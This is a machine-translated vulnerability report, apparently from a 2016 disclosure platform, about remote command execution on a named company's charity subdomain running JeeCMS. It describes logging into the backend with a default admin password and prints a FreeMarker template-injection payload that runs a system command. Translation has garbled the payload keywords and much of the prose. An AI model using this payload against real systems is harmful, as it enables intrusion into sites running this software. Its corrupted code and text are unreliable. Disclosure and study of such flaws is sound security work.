漏洞标题 在一个完美的世界中,第三方程序存在漏洞。 Getshell可以执行系统命令。 相关制造商 一个完美的世界 漏洞作者 梧桐雨 提交时间 2016-04-25 16: 56 公共时间 2016-06-09 17: 40 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 密码弱,第三方框架 漏洞详细信息 子域扫描自动发现: http://gongyi.wanmei.com/ 通过指纹识别发现它是jeecms。 有一个默认用户密码: admin,密码
登录后台后,找到黑暗云中的历史jeecms以获取shell漏洞。 < #assign ob='freemarker.template.utility.ObjectConstructor'?new()> < #assign br=ob('java.io.BufferedReader',ob('java.io.InputStreamReader',ob('java.lang.ProcessBuilder','ifconfig')。start()。getInputStream())) > < #list 1.10000 as t> < #assign line=br.readLine()!'null'> < #if line=='null'> <#破> < /#如果> $ {}行 $ { '&LT峰; br>'} < /#列表> 执行系统命令:
Www许可
漏洞证明: 执行系统命令:
Www许可
修理计划: 更改弱密码。 版权声明:请注明出处。梧桐宇@乌云